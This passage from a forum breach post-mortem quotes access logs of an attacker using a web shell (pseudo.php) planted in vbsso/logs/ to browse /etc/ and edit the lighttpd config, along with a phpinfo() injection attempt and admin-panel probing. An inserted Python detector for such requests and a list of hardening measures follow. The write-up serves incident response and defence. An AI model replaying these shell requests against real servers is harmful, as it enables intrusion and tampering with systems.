91.236.116.109 villavu.com - [05/Jul/2013:22:28:03 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:04 +0200] "POST /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 22074 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:04 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:04 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:05 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:35 +0200] "POST /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 22048 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:35 +0200] "GET /forum/vbsso/logs/pseudo.php?sorttable HTTP/1.1" 200 9631 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:36 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "http://villavu.com/forum/vbsso/logs/pseudo.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:29:36 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:30:00 +0200] "GET /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 1429 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

And finally, he continues to play around a bit more:

91.236.116.109 villavu.com - [05/Jul/2013:22:40:39 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/private.php?folderid=0&pp=50&sort=date&page=2" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:40:49 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/private.php?folderid=0&pp=50&sort=date&page=4" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:41:08 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/private.php?folderid=0&pp=50&sort=date&page=6" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:43:42 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/forumdisplay.php?f=31" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:44:38 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/modcp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:44:38 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/modcp/index.php?do=head" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:48:25 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:48:25 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/admincp/index.php?do=head" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:50:18 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/forum.php?cwd=phpinfo();" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:51:51 +0200] "POST /forum/ajax.php HTTP/1.1" 200 1429 "http://villavu.com/forum/admincp/faq.php?faq=%20welcome" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:22:56:17 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/showthread.php?t=95704" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:00:01 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:00:01 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/admincp/index.php?do=head" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:00:12 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/admincp/attachment.php?do=types" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:10:49 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/admincp/index.php?do=head" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:10:49 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/admincp/index.php?do=nav" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:11:01 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/admincp/faq.php?faq=welcome" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:12:38 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=490" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:12:45 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=2538" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:13:28 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=2" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:13:35 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=1383" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:14:04 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=45543" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:14:25 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/user.php?do=viewuser&u=5" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:15:10 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/forum.php?do=modify" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
91.236.116.109 villavu.com - [05/Jul/2013:23:16:39 +0200] "POST /forum/ajax.php HTTP/1.1" 200 580 "http://villavu.com/forum/modcp/forum.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
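As an added example that is not part of this write-up, here is a small Python detector run over constructed lines modelled on the log excerpts above. It flags the three patterns that stand out in them: a PHP script served from a directory that should only hold data (vbsso/logs/), query parameters that carry absolute filesystem paths (d=/etc/, edit=/etc/lighttpd/lighttpd.conf), and POSTs to such a script. The set of data-only directory names and the 203.0.113.7 client address are assumptions.

```python
"""Flag web-shell-style requests in lighttpd access logs.

Added example, not part of the original write-up. It reads the same log
layout the post quotes (client, vhost, user, timestamp, request, status,
bytes, referer, user agent) and raises three kinds of findings:

  php-in-data-dir   a .php script served from a directory that should only
                    hold data (the breach ran pseudo.php out of vbsso/logs/)
  fs-path-param     a query parameter, in the request or its referer, whose
                    value is an absolute filesystem path (d=/etc/, edit=...)
  post-to-shell     a POST to a script already flagged as php-in-data-dir
                    (the shell's file editor saves its changes via POST)
"""
import re
from urllib.parse import parse_qs, urlsplit

# lighttpd accesslog with a leading vhost column, as in the quoted log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<vhost>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Directory names under the docroot that hold uploads or logs, never code.
# Assumed set for this example; tune it to the application's layout.
DATA_DIRS = {"logs", "attachments", "customavatars", "customprofilepics"}

# Constructed sample modelled on the lines quoted in the post; the
# documentation address 203.0.113.7 stands in for the real client.
SAMPLE_LOG = [
    '203.0.113.7 villavu.com - [05/Jul/2013:22:27:32 +0200] "GET /forum/forum.php HTTP/1.1" 200 37740 "-" "Mozilla/5.0"',
    '203.0.113.7 villavu.com - [05/Jul/2013:22:24:09 +0200] "GET /forum/vbsso/logs/pseudo.php?d=/etc/ HTTP/1.1" 200 127972 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/" "Mozilla/5.0"',
    '203.0.113.7 villavu.com - [05/Jul/2013:22:24:15 +0200] "GET /forum/vbsso/logs/pseudo.php?favicon HTTP/1.1" 200 786 "-" "Mozilla/5.0"',
    '203.0.113.7 villavu.com - [05/Jul/2013:22:27:24 +0200] "POST /forum/vbsso/logs/pseudo.php HTTP/1.1" 200 22076 "http://villavu.com/forum/vbsso/logs/pseudo.php?d=/etc/lighttpd/&edit=/etc/lighttpd/lighttpd.conf" "Mozilla/5.0"',
    '203.0.113.7 villavu.com - [05/Jul/2013:22:27:33 +0200] "GET /forum/images/aria/misc/blog/top-highlight.png HTTP/1.1" 404 345 "http://villavu.com/forum/forum.php" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if malformed."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def fs_path_params(url):
    """Return (param, value) pairs whose value is an absolute filesystem path.
    Bare flags such as ?favicon have an empty value and are ignored."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [(k, v) for k, vals in params.items() for v in vals if v.startswith("/")]


def php_in_data_dir(path):
    """True when a .php script lives in (or below) one of DATA_DIRS."""
    parts = path.lower().split("/")
    return parts[-1].endswith(".php") and any(p in DATA_DIRS for p in parts[:-1])


def scan(lines):
    """Run the three rules over an iterable of log lines.

    Returns a list of (line_number, rule, detail) tuples, one per finding."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue
        path = urlsplit(rec["target"]).path
        shell_like = php_in_data_dir(path)
        if shell_like:
            findings.append((n, "php-in-data-dir", path))
        # Check the request's own query string and the referer: the shell's
        # POSTs carry no query, but the referer still names the edited file.
        pairs = []
        for url in (rec["target"], rec["referer"]):
            for pair in fs_path_params(url):
                if pair not in pairs:
                    pairs.append(pair)
        for param, value in pairs:
            findings.append((n, "fs-path-param", f"{param}={value}"))
        if shell_like and rec["method"] == "POST":
            findings.append((n, "post-to-shell", path))
    return findings


if __name__ == "__main__":
    for lineno, rule, detail in scan(SAMPLE_LOG):
        print(f"line {lineno}: {rule:16} {detail}")
```

On the constructed sample this yields eight findings; on the real log every hit on pseudo.php outside the forum's own PHP tree would have been flagged from the first request on.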

Part 5: Conclusion

All in all, a few things are not clear. Mostly: how was he able to edit the /etc/lighttpd/lighttpd.conf file, and how was he able to restart the lighttpd server? This would require root access, and it also seems that he changed the permissions of /etc/lighttpd/lighttpd.conf to 777. Possibly one of the uploaded shells contained a root exploit?

Regardless, it seems very unlikely that he managed to escape the Linux-VServer, as it is explicitly designed to withstand root access in the guest. This is something I will investigate further.

I have no reason to believe that they took more data than the user table. This is of course still possible, but not likely.

The entire access.log of this IP can be found here: http://merlijn.xxx/foo.txt (including the old mysql password, who cares anymore)

Part 6: Afterthoughts

What we will do now:

  • Establish better personal hotline / contacts between administrators. Personally, I would like to go for GPG authentication.

  • Switch to bcrypt

  • Audit the database

  • Make everything in the docroot read only:

    mount -o bind /docroot /newdocroot
    mount -o remount,ro /newdocroot
    
  • Have MySQL listen on a Unix socket only, possibly even outside the VM

  • Set up a more restrictive firewall

  • Set up tripwire / snort

  • IP filter on admincp (we already had an extra security layer), or other extra authentication.

  • Restore the (broken) backup system.

  • Allow access to admincp and modcp ONLY over ssh, forwarding a specific port.

And finally... If I got paid to do this, I would:

  • Change to phpBB3.
  • Write my own bulletin board system in Python.
  • Set up a reverse proxy to only allow specific requests to vBulletin/phpBB.
  • Disable all unused php internal functions.

Update July 21: Some additional suggestions by the friendly and helpful 2600nl people, who also helped me out with the initial audit:

  • Making /etc read only
  • Mounting /proc with hidepid=2 to prevent users from seeing the processes of other users